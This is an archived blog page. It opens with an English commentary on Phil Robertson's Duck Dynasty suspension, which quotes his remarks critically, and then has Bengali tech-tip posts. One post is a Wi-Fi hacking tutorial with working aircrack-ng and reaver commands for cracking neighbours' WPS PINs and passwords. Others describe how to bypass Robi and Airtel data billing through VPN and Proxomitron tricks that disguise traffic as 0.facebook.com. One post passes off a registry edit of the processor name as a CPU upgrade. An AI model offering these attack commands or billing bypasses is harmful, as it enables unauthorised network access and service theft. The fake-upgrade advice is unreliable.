Popular Post

zwani.com myspace graphic comments

Archive for 2013-12-15

'Duck Dynasty' star Phil Robertson suspended from show after equating homosexuality with bestiality


Reality TV series patriarch called gay sex 'not logical' in shocking interview with GQ. A&E Networks, the home of 'Duck Dynasty,' responded by suspending Robertson from the show, saying they were 'extremely disappointed' to read his comments. Conservative pundit Sarah Palin chimed in to defend the reality star, slamming ‘intolerants’ denying the Louisiana hunter his right to free speech.


 

‘Duck Dynasty’ star Phil Rob
 Phil Robertson of DUCK DYNASTY profiled in the January 2014 issue of GQ Photo Credit: Jeff Reidel/GQ GOOD FOR PRINT AND WEB
ertson took aim at homosexuality in an interview with GQ. Equating same-sex relationships to bestiality, he called homosexuality ‘not logical’ — and was subsequently suspended from the reality show by A&E Networks.

“Duck Dynasty” star Phil Robertson has been suspended from the reality program following shocking remarks he made in the latest edition of GQ magazine but conservative pundit Sarah Palin is coming out to defend his right to free speech.
In an interview in the January issue of GQ, the 67-year-old reality television star and darling of the political right equated same-sex relationships with bestiality.

Why ‘Duck Dynasty’ Star Phil Robertson’s Anti-Gay Remarks Brought Him Down

After an interview appeared in GQ in which he equated homosexuality to bestiality, used a quote from Corinthians which likened gays to “drunkards” and “prostitutes,” and questioned the “logic” of gay sexual practices, Phil Robertson has been suspended indefinitely from A&E’s hit show, “Duck Dynasty.”
“We are extremely disappointed to have read Phil Robertson’s comments in GQ, which are based on his own personal beliefs and are not reflected in the series Duck Dynasty,” A&E said in a statement. “His personal views in no way reflect those of A+E Networks, who have always been strong supporters and champions of the LGBT community. The network has placed Phil under hiatus from filming indefinitely.”
Left to right, Willie Robertson, Phil Robertson and Si Robertson of “Duck Dynasty” on May 9, 2012 in New York City. (Getty)
The semi-scripted reality show focuses on Phil and his family as they get involved in all sorts of misadventures such as plundering beehives and blowing up beaver dams. With 14 million weekly viewers, according to Nielsen—2 million more than the series finale of “Breaking Bad—it has become a massive cable TV hit. Its mix of faith, humor and revealing honesty has clearly struck a nerve with fans, who not only tune in to the show but have made the Robertsons best-selling authors as well as the inspiration for a whole variety of products such as a bobblehead dolls, camo apparel, Cajun-spice seasoning, iPhone games and a bestselling Christmas album.
The show has wildly devoted fans and the Facebook page supporting Robertson since his suspension, asking people to boycott A&E until they bring him back to the show, reached 165,000 likes in less than four hours. Most of the posts there describe the issue as one of freedom of speech and freedom of religion, and many of the show’s fans see this suspension as one more blow against the Christian faithful. Freedom of religion is under attack, these posts say. “It’s just like Chik-Fil-A,” another says. Many commend Robertson for standing up for his faith and his beliefs.
The challenge is in explaining to these die-hard believers that what Robertson said is not simply an expression of his faith, but something that’s widely viewed as vile and hateful and out of step with today’s corporate reality. I wonder if these people realize that the very same biblical arguments made against same-sex marriage today were once made against interracial marriage in the ’50s and ’60s. Had Robertson made controversial remarks against blacks, or Hispanics, or other minorities, would they still resort to freedom of speech arguments? Perhaps many might, but in today’s media world, corporations like A&E have decided they can no longer sit back and allow the stars of their programs—even their highest rated show—to make comments that are widely perceived as outrageous and crossing a line.
Robertson did say a few things about African Americans in his GQ interview (the remarks haven’t drawn as much attention as his anti-gay statements), saying that when he was growing up in Louisiana, “I never, with my eyes, saw the mistreatment of any black person. Not once. Where we lived was all farmers. The blacks worked for the farmers. I hoed cotton with them. I’m with the blacks, because we’re white trash. We’re going across the field…. They’re singing and happy. I never heard one of them, one black person, say, ‘I tell you what: These doggone white people’—not a word!… Pre-entitlement, pre-welfare, you say: Were they happy? They were godly; they were happy; no one was singing the blues.”
Robertson is certainly entitled to his beliefs, despite how backward they may seem in 2013. But groups like HRC and GLAAD are also entitled to not only call him out for the interview, but call on the network to take action. It makes no difference, as many believe, that gays aren’t really watching Duck Dynasty.  In today’s corporate world and pop culture landscape, the new reality is that there’s only one place left for the homophobes—and that’s for them to remain in the closet.

পিসিতে আনলিমিটেড ফ্রি নেট ব্যবহার করুন আপনার রবি সিম দিয়ে (VPN)

এই পর্যন্ত আপনারা Pd Proxy, Proxifier, Ispce ও নানা রকম Vpn দিয়ে ফ্রি নেট চালিয়েছেন ।
এবং আমার জানা মতে কিছুদিন আগে সকলে PD PROXY দিয়ে ফ্রি নেট চালাচ্ছিলেন ।
কিন্তু এখন তা আর চলছে না । তাই আজ আপনাদের জন্য নতুন একটি সিস্টেম নিয়ে এলাম ।
আমি গত ১ মাস যাবত এই সিস্টেমে ফ্রি নেট ব্যবহার করছি । এইটির সবচেয়ে বড় সুবিধা হল এইটির কোন লিমিট নেই এবং এ্যাকাউন্ট খোলার কোন ঝামেলাও নেই । এটি আনলিমিটেড ।
তাই আশা করি আপনাদের ভালো লাগবে ।
যা যা লাগবেঃ
১। মডেম অথবা Pc Suite
২। Robi সিমে যেকোন একটি প্যাকেজ থাকতে হবে ।
৩। ProXPN নামক একটি সফটওয়্যার লাগবে ।
কার্যর্‍প্রনালীঃ
প্রথমে এখান থেকে ProXPN.exe নামক সফটওয়্যারটি ডাউনলোড করুন ।
এবার এই সফটওয়্যারটি পিসিতে ইনস্টল দিন । সফটওয়্যারটি ওপেন করতে হবে না ।
ইনস্টল শেষে এইখানে যানঃ C://Program Files/proxpn/bin/

এবার উপরের পিকচারে যেই চারটি ফাইল (openssl.exe, openvpn.exe, proxpn.exe, tapinstall.exe) কে দেখানো হয়েছে সেই চারটি ফাইলকে একটি একটি করে Administrator Permission দিতে হবে ।
যেকোন একটি ফাইলকে সিলেক্ট করুন এরপর মাউসের Right Button এ ক্লিক করুন এরপর নিচের দিকে এসে Properties এ ক্লিক করুন ।

এরপর Compatibility এ ক্লিক করুন, এরপর Run this program as an administrator অপশনটিকে mark করুন তারপর OK বাটনে ক্লিক করন । এইভাবে চারটি ফাইলকে Administrator Permission দিন ।
এবার Vpn Settings.zip ফাইলটি ডাউনলোড করুন ।
ডাউনলোড হয়েগেলে ফাইলটি Extract করুন । Extract করলে এই দুইটি ফাইল পাবেনঃ Vpn Settings.ovpn ও vpn.txt
এবার এই ফাইল দুইটিকে আপনার পিসির Desktop এ রাখুন ।

[Note : এই ফাইল দুইটিকে আপনার পিসির Desktop এ না রেখে যদি অন্য কোন ফোল্ডারে রাখেন তাহলে ফ্রি নেট চলবে না ]
সেটিংস এর কাজ শেষ ।
যে কাজটি প্রতিবার করতে হবেঃ
১। প্রথমে আপনার Robi সিমে যেকোন একটি ইন্টারনেট প্যাকেজ এ্যকটিভ করুন এবং নেট কানেক্ট করুন (নরমালি যেভাবে করেন) । [ Small Package = 4 MB Price : 2.30 tk (with vat). Dial *8444*4# to Active this Package. For Check Dial *8444*88#]
২। এবার Vpn Settings.ovpn ফাইলটিকে সিলেক্ট করে মাউসের Right button এ ক্লিক করুন, এরপর Start proXPN on this config file এ ক্লিক করুন । ক্লিক করলে একটি কালো পেইজ আসবে এবার কয়েক সেকেন্ড অপেক্ষা করুন...

যদি সবকিছু ঠিকঠাকভাবে করতে পারেন তাহলে কালো পেইজটি উপরের পিকচার এর মতো হবে । লক্ষ্য রাখবেন শেষ লাইনটি এমন হবে "Initialization Sequence Completed" । এবার এই কালো পেইজটিকে মিনিমাইজ করে রাখুন । এই পেইজটিকে Cancel করবেন না ।
[Note : ২ নং কাজটি ১ নং কাজ শেষ হবার সাথে-সাথেই করবেন ]
আপনার পিসি এখন ফ্রি ইন্টারনেট ব্যবহারের জন্য সম্পন্ন প্রস্তুত ।
এখন আপনি আপনার পিসিতে Firefox, Chorome, IDM, Skype, ইত্যাদি যা ইচ্ছে তাই ব্যবহার করতে পারবেন ।
কিছু গুরুত্বপূন কথাঃ
যদি কোন কারনবসত আপনার নেট কানেকশন ডিসকানেক্ট হয়ে যাই অথবা আপনার মডেমটি পিসি থেকে বের করে নেন তাহলে আপনার প্যাকেজের সম্পন্ন MB অথার্ত 4 MB কেটে নিবে । মোবাইলের টাকা কাটবে না ।
এক্ষেত্রে আপনাকে পুনরায় নতুন একটি প্যাকেজ নিতে হবে । কিন্তু Robi সিমে প্যাকেজ এর MB শেষ হয়েগেলেও প্যাকেজটি থেকে যাই এজন্য পুনরায় একই প্যাকেজ নিতে হলে প্রথমে পূর্বের প্যাকেজটি Cancel করতে হবে । এর জন্য ডায়াল করুন *8444# এরপর 2 চেপে ok করুন এরপর 1 চেপে ok করুন এরপর আবার 1 চেপে ok করুন । তাহলে আপনার প্যাকেজটি Cancel হয়ে যাবে । এবার আগের মতো করে *8444*4# ডায়াল করে নতুন একটি 4 MB এর প্যাকেজ এ্য্যকটিভ করুন ।
4MB কে রক্ষা করার উপায়ঃ অনেক খোজাখুজি করে একটি উপায়টি বের করেছি । এই উপায়টি একটু ঝামেলার । তারপরও অনেকেই এই উপায়টি দ্বারা উপকৃত হবেন ।
তাই এটি শেয়ার করছি । উপায়ঃ আপনি যদি মোবাইল দিয়ে পিসিতে নেট ব্যবহার করেন তাহলে মোবাইল থেকে ব্যাটারে খুলে নিন, এবার মোবাইলে ব্যাটারি লাগিয়ে চালু করুন দেখবেন 4 MB রয়েগেছে ।
Tag : ,

GP তে ৩৩ টাকায় ১.৫GB এর উপরে DOWNLOAD করুন ----২৫৬ kbps------( it’s a gp package)

পোষ্টটিতে বিস্তারিত দেওয়া তাই অনেক বড় মনে হবে। তাতে কি? আজীবনত ৩৩টাকায় ১.৫জিবি++ ডাউনলোড করতে পারবেন।
কাজ শুরু করি?
যা লাগবে-
১। GP internet Postpaid sim (একটা কিনে নিবেন) [customer care থেকে] (২০০ TK)
২। Modem / mobile(internet supported)
Accessories[বেশি পরিমান Download এর জন্য]---
১। IDM (for pc) (থাকলে ভাল হয়) (নিচে 3D ভারসন download লিংক দিলাম)
IDM  Download (3 MB)
২। Loader droid (for android) (থাকলে ভাল হয়) (নিচে লিংক দিলাম)
Loader droid Download (2MB)
---৩৩ টাকায় ১.৫জিবি++ ব্যবহারের নিয়ম---
রাত ১২.০১ এর পরে
Type P2 & send to 5000
এখন আপনার P2 (unlimited)[৫ জিবি] package active হবে ।
এখন আপনার P2 এর জন্য ৩০ দিনের চার্জ হবে ৯৮০ টাকা।
কোন চিন্তা নাই। ৯৮০ টাকা একবারে কেটে নিবে না।
দৈনিক ব্যবহার শেষে ৩৩ টাকা কেটে নিবে:)
আপনি যদি ৫০ টাকা রিচার্জ করেন তবে ৩৩ টাকার বেশি কাটতে পারবে না। তবে ১দিন(রাত ১২:০১-পরের দিন সকাল ৯:০০ = ৩১ঘন্টা) পর সিমটি barred হয়ে যাবে। আর যদি ৬৬টাকা রিচার্জ করেন তবে ২ দিন পর সিমটি barred হয়ে যাবে। [কোন চিন্তা নাই: আবার যখন ব্যবহার করবেন তখন আবার শুধু রিচার্জ করলেই সিমটি ৩০ মিনিটের মধ্যে চালু হবে]
--- আমি এক দিনে ১.৭০ জিবি [@ ২৫৬ kbps] ডাউনলোড করেছি ---
সতর্কতা---
১। ভুলেও P2 ব্যতীত P1 সহ অন্য কোন package active করবেন না।
[ কারন? ??
--আমি ৮৩০ টাকা ধরা খাইছি]
২। এক বার P2 active করলেই হবে। আর active বা deactive কোনটাই করবেন না। কারন? = P2 প্রতি মাসে auto renew হবে। আর যদি deactive করেন তবে পুরো মাসের ৯৮০ টাকাই ছেপ দিয়ে গুনে দিতে হবে। [কথা শুনে রাগ করবেন না]
---রিচার্জ স্বমন্ধে বিস্তারিত---
১। রিচার্জ এর সময় দোকানদারকে অবশ্যই বলবেন যে আপনার সিমটি পোষ্টপেইড। [নাহলে টাকা এই জীবনে রিচার্জ হবেনা]
২। জিপি ইন্টারনেট পোষ্ট পেইড সিমে ৫০ টাকার নিচে রিচার্জ করা যায় না। [এতে সুবিধা হল ৫০ টাকা রিচার্জে একবার ১ দিন ও পরের বার ৫০ টাকা রিচার্জে ২ দিন ব্যবহার করতে পারবেন]
তবে ৫০ এর উপর যেকোন পরিমাণ রিচার্জ করতে পারবেন।
[কিন্তু হিসাব রাখবেন ৩৩ টাকায় ১ দিন]
৩। চেষ্টা করবেন রাত ১২:০১ এর পর রিচার্জ করতে। এ জন্য একটি জিপি প্রিপেইড সিমে ফ্লেক্সিলোড অপশন চালু করে নিন। তখন প্রিপেইড সিম থেকে আপনার সিমে যেকোন সময় রিচার্জ করতে পারবেন।এতে বেশি সময় ডাউনলোড করতে পারবেন।
৪। আপনার সিমটি যেহেতু পোষ্টপেইড সেহেতু ৫০ টাকা লিমিট। [লিমিট সম্পর্কে জানতে কাস্টমার কেয়ারে যান। আমার ক্ষুদ্র জ্ঞানে বুঝানো সম্ভব না]
Tag : ,

এবার ইচ্ছামত আপনার প্রসেসরকে core i 7 or 9 বানিযে ফেলুন (সফ্টওয়্যার ও লাগবে না )

কোন ঝামেলা নাই, আপনি শুধু আমার দেখানো পথ অনুসরণ করুন আর পিসির কনফিগারেশনকে করে ফেলুন একদম ঝাক্কাস!!
১: run এ গিয়ে লিখুন regedit তারপর ok করুন।
২: HKEY_LOCAL_MACHINE এ ডাবল ক্লিক করুন।  নিচে দেখুন............

৩: HARDWARE >> DESCRIPTION >>system>>  CentralProcessor>> 0 তে ক্লিক করুন (ডাবল ক্লিক দিয়ে)
তারপর ডান পাশে processorName এ ক্লিক করে অপেন করুন।  নিচে দেখুন..................

এবার আপনি নিজের মত করে আপনার প্রসেসরকে পাল্টে দিয়ে ok করুন।  নিচে দেখুন..................

দেখুন আমি আমার 3 কে কোর আই 7 বানাই ফেলেছি।
Tag : ,

WIFI HACK করুণ


এইটা করার জন্য আপনাকে অবশই লিনাক্স এর যে কোন ভার্সন ইন্সটল করে নিতে হবে তবে ভাল হয় যদি (Linux mint,Ubuntu , kbuntu) এসব ভার্সন  ইন্সটল করা থাকে ।
এবার ctrl+alt+t press করুন terminal ওপেন করুন
please install Aircrak-ng
by typing - sudo apt-get install aircrack-ng এইটা লিখে এন্টার করুন যথারীতি আপনার পিসির পাসওয়ার্ড চাইবে পাসওয়ার্ড লিখে এন্টার করুন আর হ্যাঁ এর আগে নেটটা পিসির সাথে connect করতে ভুলবেন না ।
তারপর আবার ইন্সটল করুন Reaver
pls type : sudo apt-get install reaver আবার আগের মত এন্টার চাপার পর  পাসওয়ার্ড চাইবে ,পাসওয়ার্ড  দিন অ্যান্ড  এন্টার
এবার নেট connection অফ করে পিসি restart করুন ।
এবার আপনাকে অবশ্যই সামান্য  ধৈর্যর পরীক্ষা দিতে হবে
terminal ত ওপেন ই আছে না থাকলে ওপেন করে নিন টাইপ করুন
sudo airmon-ng start waln0 লিখে এন্টার করন পাস কোড চাইবে দিন
দেখবেন নিচে একটা লেখা আসবে ( monitor mode enabled on mon1/mon0/mon4)
ব্যাস হয়ে গেল প্রথম স্টেপ
please type : sudo airodump-ng mon0   (এখানে MONO র সাথে zero hobe )

এবার আপনি  দেখবেন আশে পাশের ওয়াইফাই র নেট গল শো করছে screen shot অনুযায়ী
now final step
press cntrl+c
sudo reaver -i mon0 -b (your desired bssid)  -vv -d 0 -S
example :  sudo reaver -i mon0 -b C8:3A:35:26:D5:31 -vv -d 0 -s
press enter  and wait for while,  then u will show after some time
like this
wps pin:25452006
wps psk:sakkhor /whatever they used their name as network
ap ssid : tplink /tenda/whaterver they used
enjoy !!!!!!!!!!! enjoy!!!!!!!!! enjoy!!!!!!!!
Tag : ,

পিসিতে যেকোন অপারেটরে ইন্টারনেট ব্রাউজ করুন সুপার স্পীডে ।

ব্রাউজিং এ সুপার স্পীড পেতে আমরা যা ব্যবহার করবঃ-
ক। ১ টি Mozilla Firefox Browser
খ। জানা/অজানা কিছু Tweaks (Firefox latest version এ নিচের অনেক Tweak already অন্তর্ভুক্ত থাকতে পারে । সেক্ষেত্রে আপনি শুধু ঐ Tweak এর  value ঠিক আছে কি তা যাচাই করতে পারেন  )
গ। NoScript নামের ১ টি Firefox Add-ons ।
তাহলে শুরু করা যাক -
১। যদি Mozilla Firefox Browser ইন্সটল দেওয়া না থাকে , তাহলে ইন্সটল দিয়ে নিন । latest version হলে ভাল হয় ।
২। address bar লিখুন  about:config  এরপর enter চাপুন । I’ll be careful, I promise! এ ক্লিক করুন ।

৩। Search এ লিখুন network.http.pipelining  এর উপর ডাবল ক্লিক করুন যেন Value  true হয় ।

৪। Search এ লিখুন  network.http.pipelining.maxrequests এর উপর ডাবল ক্লিক করুন যেন Value  করে দিন ।

৫। Search এ লিখুন network.http.proxy.pipelining এর উপর ডাবল ক্লিক করুন যেন Value  true হয় ।

৬। Search এ লিখুন network.dns.disableIPv6 এর উপর ডাবল ক্লিক করুন যেন Value  true হয় ।

৭। about:config window তে যেকোন জায়গায় Right-click করুন । New সিলেক্ট করুন । Boolean এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.interrupt.parsing
Value দিন true  এরপর ok ক্লিক করুন ।
৮। about:config window তে যেকোন জায়গায় Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।

নতুন window ওপেন হলে নাম দিন content.max.tokenizing.time

Value দিন 2250000  এরপর ok ক্লিক করুন ।

( নিচের tweak গুলো সাবধানতার সাথে যোগ করুন । ছবি আপলোড দিতে পারলাম না বলে দুঃখিত )
৯। about:config window তে যেকোন জায়গায় Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.notify.interval
Value দিন 750000  এরপর ok ক্লিক করুন ।
১০। about:config window তে যেকোন জায়গায় Right-click করুন । New সিলেক্ট করুন । Boolean এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.notify.ontimer
Value দিন true  এরপর ok ক্লিক করুন ।
১১। Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.notify.backoffcount
Value দিন 5  এরপর ok ক্লিক করুন ।
১২। Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.switch.threshold
Value দিন 750000  এরপর ok ক্লিক করুন ।
১৩। Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন nglayout.initialpaint.delay
Value দিন 0  এরপর ok ক্লিক করুন ।
১৪। Search এ লিখুন network.proxy.socks_remote_dns এর উপর ডাবল ক্লিক করুন যেন Value  true হয় ।
উপরের কাজগুলো আশা করি সঠিক ভাবে করেছেন । এবার NoScript Add-ons ইন্সটল দেওয়ার পালা । এটা কিভাবে কাজ করে তা বলতে গেলে অনেক সময় লেগে যাবে ।এটি অনাকাঙ্ক্ষিত সকল java script কে বাঁধা দিতে পারে যে script গুলো আপনার ব্রাউজিং স্পীডকে স্লো করে দেয় । পাশাপাশি এটি আপনার ওয়েব ব্রাউজিং এ নিরাপত্তা নিশ্চিত করে । এই দেখুন কাকে কি বলছি ! এগুলো তো আপনারা জানেন ।  তাই চলুন শুধু ইন্সটল ও সেটিং পদ্ধতি নিয়ে কিছু কথা বলি ।
১। এখানে যান । ইন্সটল কে ক্লিক করুন । allow করুন । কিছুক্ষণ অপেক্ষা করুন । download শেষে ইন্সটল করুন ।
২। Mozilla Firefox এর Tools-Add-ons-Extensions এ গিয়ে NoScript এর options এ ক্লিক করুন ।

৩। Whitelist এ ক্লিক করুন । Whitelist এর সকল url সিলেক্ট করে কীবোর্ড এ ডিলিট চাপুন । অর্থাৎ Whitelist এর সকল url ডিলিট করে ফেলুন । ok ক্লিক করুন ।

৪। Mozilla Firefox ক্লোজ করে আবার চালু করুন ।
৫। ভাল ফলাফলের জন্য আপনাকে manually java Script বন্ধ করতে হবে । আমি এখানে একটি ওয়েব সাইট দিয়ে উদাহরণ দিব । কিন্তু আপনি যখনই কোন ওয়েব সাইটে  যাবেন তখনই manually java Script বন্ধ করে দিবেন । একবার বন্ধ করলে প্রতিদিন আপনাকে আর এই কাজ করতে হবেনা ।
৬। ধরুন আপনি http://bdmusic24.net/  সাইটে প্রবেশ করলেন । Firefox এর address bar এর ঠিক বামে , যেখানে favicon থাকে । সেখানে NoScript এর favicon  দেখাচ্ছে. সেখানে ক্লিক করুন । Untrusted এ ক্লিক করুন । mark ………….. as untrusted  . এখানে অনেক গুলো Domain দেখাচ্ছে - যেমন -
mark wordpress.com as untrusted
mark facebook.com as untrusted
mark gandrad.org as untrusted
mark  onclikads.net as untrusted
ইত্যাদি।
এক এক করে প্রতি টি Domain এ ক্লিক করুন । এমনকি http://bdmusic24.net/  সাইটকেও ।  তাহলে সবগুলো  Untrusted লিস্টে যোগ হবে । এই Domain গুলো যদি অন্য কোন সাইটে ও থাকে তারপরও আপনাকে আর কখনও এগুলো Untrusted লিস্টে যোগ করতে বলা হবে না ।  আমি কি বুঝাতে পেরেছি , নাকি পেরেছি ?

৭। Firefox এর নিচের দিকে NoScript এর একটি বার দেখাবে । সেখানে ম্যাসেজ এ আপনি দেখতে পাবেন কত টি Script কে বন্ধ করা হয়েছে । নিচের ছবির মত ।

৮। আর একটি কথা কিছু সাইট java script ছাড়া চালান সম্ভব হবে na। যেমন - ফেসবুক ।
আপনি পূর্বে ফেসবুক Untrusted এ নিয়েছেন । সমস্যা নেই । যখন ফেসবুক ব্যবহার করবেন । তখন Right-click করে temporary allow facebook.com করে দিন ।
Tag : ,

Airtel free internet for computer 100% (2G+3G)

আপনারা জানেন এয়ারটেলে সম্পূর্ণ ফ্রি নেট ব্যবহার করা যায় না , কিছু মেগাবাইট কিনতে হয় যা আস্তে আস্তে খরচ হয় । ধরে নিলাম , আপনি ২০ মেগাবাইটের একটি প্যাকেজ ক্রয় করেছেন , এখান থেকে আস্তে আস্তে মেগাবাইট খরচ হবে । মজার বিষয় বিভিন্ন জন বিভিন্ন সময় ধরে এই ২০ মেগাবাইট টিকিয়ে রাখতে পারে । কেউ ৫ ঘণ্টা , কেউ ১০ ঘণ্টা , কেউ আবার এর চেয়েও অনেক বেশি , প্রায় ১ সপ্তাহ । যেহেতু এই পদ্ধতি একেবারে ফ্রি নয় , সেহেতু একবারের জন্য আমার টিউন ফলো করে দেখুন , আপনার লাভ হচ্ছে নাকি লস ।  আমাদের উদ্দেশ্য হবে এই ২০ মেগাবাইটকে যত বেশি সময় টিকিয়ে রেখে যত বেশি ইন্টারনেট ব্যবহার করা যায় । আজকের টিউন কে আমরা ২ ভাগে ভাগ করতে পারি ।
ক। এয়ারটেল ফ্রি নেট চালানোর পদ্ধতি / কৌশল 
খ। মেগাবাইট টিকিয়ে রাখার / কম খরচ করার কিছু পদ্ধতি / কৌশল
ক। এয়ারটেল ফ্রি নেট চালানোর পদ্ধতি / কৌশল
১। http://www.mediafire.com/download/zqbyywx7nn3rgr7/Proximitron.zip এখান থেকে জীপ ফাইলটি ডাউনলোড করে যেকোন ড্রাইভে Extract করুন ।
২। Proxomitron এ ডাবল ক্লিক করুন । দেখুন এটি Taskbar এ দেখাচ্ছে । সেখানে ক্লিক করে Proxomitron ওপেন করুন।


৩। Automatic config ফাইল লোড না হলে, Load এ ক্লিক করুন । default config ফাইলটি চিনিয়ে দিন ।

৪। মডেম কানেক্ট করুন । APN- internet (20 MB package নেওয়ার জন্য ডায়াল করুন *321*77# )
৫। BYPASS FILTERS এ ক্লিক করুন ।

৬। Browser এ Proxy- 127.0.0.1 এবং Port- 8080 সেট করুন ।
৭। Browser এ হোমপেজ সেট করুন 0.facebook.com অথবা সরাসরি address বারে লিখুন 0.facebook.com , enter চাপুন ।
৮। 0.facebook.com পেজটি redirect হয়ে নিচের মত পেজ আসবে । url লিখার জায়গায় আপনার কাঙ্ক্ষিত ওয়েবসাইটের ঠিকানা লিখে ইন্টারনেট ব্রাউজ ও ডাউনলোড করুন । (  Download করার সময়  দেখাবে -  download from 0.facebook.com )

৯। আমি config ফাইলে কয়েকটি Proxy Server যোগ করে দিয়েছি । যেমন- hidethisip.net:80
85.17.141.35:80
german-proxy.de:80
zacebook.com:80
যদি আপনি Proxy Server পরিবর্তন করতে চান তাহলে Proxomitron এ manage proxies এ ক্লিক করে নিচের মত Proxy Server সিলেক্ট করতে পারেন ।

খ। মেগাবাইট টিকিয়ে রাখার / কম খরচ করার কিছু পদ্ধতি / কৌশল
শুধু ফ্রি নেটের ক্ষেত্রেই নয় , টাকা দিয়ে যারা অন্য ISP ব্যবহার করেন তাদের জন্যেও নিচের কিছু বিষয় কাজে আসবে আশা করি ।
১। এই পদ্ধতি ব্যবহার করার সময় আপনি কখনই ভুল করেও address বারে 0.facebook.com ব্যবহার না করে অন্য url ব্যবহার করবেন না । অবশ্যই 0.facebook.com দিয়ে enter চাপুন । আপনি ইন্টারনেটের যত গভীরেই প্রবেশ করুন না কেন , প্রত্যেকটি সাইটে url নিচের মত শুরুতে http://0.facebook.com........................... দিয়ে দেখাবে । এটি অটোমেটিক জেনারেট হবে ।

২। আপনার পিসিতে সকল ধরনের Automatic Update বন্ধ করে দিন । কারন Update নিতে গেলে এই ২০ MB আগামী ২০ মিনিটেই শেষ হয়ে যাবে ।
৩। আপনাকে খেয়াল রাখতে হবে পিসিতে Proxomitron এবং Browser ছাড়া অন্য কোন software Data / ইন্টারনেট ব্যবহার করছে কিনা , করলে ঐ Data / ইন্টারনেট ব্যবহারকে বন্ধ করতে হবে ।
প্রথমে আমরা খুঁজে বের করব এই মুহূর্তে আপনার পিসিতে কোন কোন ক্ষেত্রে Data / ইন্টারনেট ব্যবহার হচ্ছে । এর জন্য Run এ লিখুন cmd , enter চাপুন । cmd ওপেন হবে । এবার লিখুন - netstat –b (netstat এর পরে একটি স্পেস হবে ) । enter চাপুন । নিচের মত লিস্ট দেখতে পাবেন । এই মুহূর্তে আপনার পিসিতে কোন কোন ক্ষেত্রে Data / ইন্টারনেট ব্যবহার হচ্ছে । এখানে PID -র নং আপনার প্রয়োজন হবে।

উপরের ছবিতে দেখা যায় আমার পিসিতে শুধু Proxomitron , Firefox Browser  এবং cometbird এ ইন্টারনেট ব্যবহার হচ্ছে । এগুলো পরিচিত নাম তাই হয়ত PID ছাড়াই আপনি এগুলো বন্ধ করতে পারেন । কিন্তু অনেক ক্ষেত্রে PID প্রয়োজন হবে ।
ধরুন , আপনার পিসিতে অন্য software Data / ইন্টারনেট ব্যবহার করছে । তাহলে তাকে বন্ধ করবেন কিভাবে ? আমি এখানে cometbird বন্ধ করে দেখাব । মনে রাখুন এখানে cometbird এর PID –3208
এবার Ctrl+Alt+Delete চেপে Task Manager ওপেন করুন । View এ ক্লিক করুন । select columns এ ক্লিক করুন । PID তে টিক দিয়ে ok ক্লিক করুন ।


Task Manager এ Processes ক্লিক করুন । এবার উপরের PID নং মিলান । এবার সেটাতে ক্লিক করে End Process ক্লিক করুন । বন্ধ হয়ে গেল তার চুরি করে মেগাবাইট খাওয়ার গল্প ।

PID For Process Identifier
netstat –ano কমান্ডে আপনি যে তথ্য পাবেন তা Real Time তথ্য নয় ।
zacebook proxy server ব্যবহার করলে DWC error/java script error দেখাবে । এই সমস্যার সমাধান পেতে এবং ব্রাউজে স্পীড বেশি পেতে  ফলো করুন ।

ব্রাউজিং এ সুপার স্পীড পেতে আমরা যা ব্যবহার করবঃ-
ক। ১ টি Mozilla Firefox Browser
খ। জানা/অজানা কিছু Tweaks (Firefox latest version এ নিচের অনেক Tweak already অন্তর্ভুক্ত থাকতে পারে । সেক্ষেত্রে আপনি শুধু ঐ Tweak এর  value ঠিক আছে কি তা যাচাই করতে পারেন  )
গ। NoScript নামের ১ টি Firefox Add-ons ।
তাহলে শুরু করা যাক -
১। যদি Mozilla Firefox Browser ইন্সটল দেওয়া না থাকে , তাহলে ইন্সটল দিয়ে নিন । latest version হলে ভাল হয় ।
২। address bar লিখুন  about:config  এরপর enter চাপুন । I’ll be careful, I promise! এ ক্লিক করুন ।

৩। Search এ লিখুন network.http.pipelining  এর উপর ডাবল ক্লিক করুন যেন Value  true হয় ।

৪। Search এ লিখুন  network.http.pipelining.maxrequests এর উপর ডাবল ক্লিক করুন যেন Value  করে দিন ।

৫। Search এ লিখুন network.http.proxy.pipelining এর উপর ডাবল ক্লিক করুন যেন Value  true হয় ।

৬। Search এ লিখুন network.dns.disableIPv6 এর উপর ডাবল ক্লিক করুন যেন Value  true হয় ।

৭। about:config window তে যেকোন জায়গায় Right-click করুন । New সিলেক্ট করুন । Boolean এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.interrupt.parsing
Value দিন true  এরপর ok ক্লিক করুন ।
৮। about:config window তে যেকোন জায়গায় Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।

নতুন window ওপেন হলে নাম দিন content.max.tokenizing.time

Value দিন 2250000  এরপর ok ক্লিক করুন ।

( নিচের tweak গুলো সাবধানতার সাথে যোগ করুন । ছবি আপলোড দিতে পারলাম না বলে দুঃখিত )
৯। about:config window তে যেকোন জায়গায় Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.notify.interval
Value দিন 750000  এরপর ok ক্লিক করুন ।
১০। about:config window তে যেকোন জায়গায় Right-click করুন । New সিলেক্ট করুন । Boolean এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.notify.ontimer
Value দিন true  এরপর ok ক্লিক করুন ।
১১। Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.notify.backoffcount
Value দিন 5  এরপর ok ক্লিক করুন ।
১২। Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন content.switch.threshold
Value দিন 750000  এরপর ok ক্লিক করুন ।
১৩। Right-click করুন । New সিলেক্ট করুন । Integer এ ক্লিক করুন ।
নতুন window ওপেন হলে নাম দিন nglayout.initialpaint.delay
Value দিন 0  এরপর ok ক্লিক করুন ।
১৪। Search এ লিখুন network.proxy.socks_remote_dns এর উপর ডাবল ক্লিক করুন যেন Value  true হয় ।
